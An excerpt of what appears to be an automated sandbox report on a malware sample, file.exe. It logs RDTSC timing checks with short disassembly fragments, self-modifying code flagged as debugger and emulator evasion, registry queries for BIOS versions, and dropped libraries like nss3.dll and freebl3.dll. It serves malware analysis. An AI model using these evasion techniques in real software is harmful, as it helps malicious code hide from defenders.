Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF605 second address: 5EF62A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C68h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF62A second address: 5EF62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF62E second address: 5EF64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C69h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF927 second address: 5EF92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF92D second address: 5EF932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EF932 second address: 5EF951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD001095A56h 0x00000009 js 00007FD001095A56h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007FD001095A5Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EFD95 second address: 5EFDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007FD000CC0C5Eh 0x0000000b jmp 00007FD000CC0C69h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5EFDC5 second address: 5EFDE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0879 second address: 5F087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F087D second address: 5F0887 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0F9F second address: 5F0FBB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD000CC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jns 00007FD000CC0C56h 0x00000011 jo 00007FD000CC0C56h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0FBB second address: 5F0FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F0FC1 second address: 5F0FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8546 second address: 5F854C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F854C second address: 5F8556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8556 second address: 5F8583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Fh 0x0000000d jmp 00007FD001095A66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F80FB second address: 5F810C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FD000CC0C56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F810C second address: 5F8125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8125 second address: 5F813C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD000CC0C62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5F8291 second address: 5F829C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD001095A56h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 604E51 second address: 604E74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD000CC0C56h 0x00000009 jc 00007FD000CC0C56h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007FD000CC0C60h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 605006 second address: 60500A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 60500A second address: 605020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD000CC0C5Eh 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 608A71 second address: 608A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD001095A56h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6087A9 second address: 6087B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD000CC0C56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6087B5 second address: 6087B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61874A second address: 618750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6185EE second address: 61860C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD001095A70h 0x00000008 jmp 00007FD001095A64h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61860C second address: 61863A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007FD000CC0C5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61863A second address: 61863E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 619D5F second address: 619D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD000CC0C63h 0x0000000a push edx 0x0000000b jnc 00007FD000CC0C56h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 619D80 second address: 619D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F7B6 second address: 61F7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD000CC0C56h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD000CC0C5Eh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 61F7D3 second address: 61F7E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD001095A56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625FDB second address: 625FFE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD000CC0C56h 0x00000008 jp 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FD000CC0C5Eh 0x00000016 jl 00007FD000CC0C56h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62492B second address: 624930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624D24 second address: 624D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624D36 second address: 624D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD001095A56h 0x0000000a jmp 00007FD001095A5Ah 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624FCC second address: 624FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 624FD2 second address: 624FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Eh 0x00000009 popad 0x0000000a jl 00007FD001095A58h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625125 second address: 625130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD000CC0C56h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625130 second address: 625137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625C89 second address: 625C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 625C91 second address: 625CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A60h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 62A04F second address: 62A058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 643428 second address: 643438 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007FD001095A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6462AF second address: 6462CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6462CA second address: 6462D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD001095A56h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6462D6 second address: 6462DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 655D68 second address: 655D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FD001095A56h 0x0000000d js 00007FD001095A56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 655D7D second address: 655DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD000CC0C65h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FD000CC0C56h 0x00000015 jmp 00007FD000CC0C63h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53DA2F second address: 53DA39 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6562E5 second address: 6562ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6562ED second address: 6562F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6562F9 second address: 656303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656303 second address: 65630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656479 second address: 656487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD000CC0C56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656487 second address: 65648B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65648B second address: 6564AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 jc 00007FD000CC0C56h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FD000CC0C56h 0x00000018 jmp 00007FD000CC0C5Bh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6564AE second address: 6564C7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD001095A5Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65660E second address: 656614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656614 second address: 656628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD001095A5Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6568E2 second address: 6568FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6568FD second address: 65691D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD001095A66h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65691D second address: 656921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 656921 second address: 65692B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65823E second address: 658242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65AA90 second address: 65AA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65AB10 second address: 65AB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65AB15 second address: 65AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65AD59 second address: 65AD5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65C3AB second address: 65C3C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD001095A56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jbe 00007FD001095A56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 65C3C1 second address: 65C410 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD000CC0C69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FD000CC0C67h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD000CC0C5Fh 0x00000019 jng 00007FD000CC0C56h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0421 second address: 52E0462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD001095A66h 0x00000009 adc cx, DA78h 0x0000000e jmp 00007FD001095A5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD001095A60h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0462 second address: 52E04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD000CC0C66h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD000CC0C67h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E04A3 second address: 52E04A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E04A9 second address: 52E04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E04FE second address: 52E0531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD001095A5Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, cx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0531 second address: 52E0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD000CC0C60h 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD000CC0C5Eh 0x00000014 sub si, 6248h 0x00000019 jmp 00007FD000CC0C5Bh 0x0000001e popfd 0x0000001f pushad 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E0575 second address: 52E059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD001095A5Fh 0x0000000a jmp 00007FD001095A63h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E059E second address: 52E05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E05A4 second address: 52E05A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579F99 second address: 579F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 579F9D second address: 579FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD001095A62h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A17D second address: 57A181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A181 second address: 57A187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A187 second address: 57A18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 57A18D second address: 57A191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E069D second address: 52E06A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52E06A3 second address: 52E06A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3C3CED instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 56CD88 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3C12B6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3C3BF2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3C3C5C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5F9C3E instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
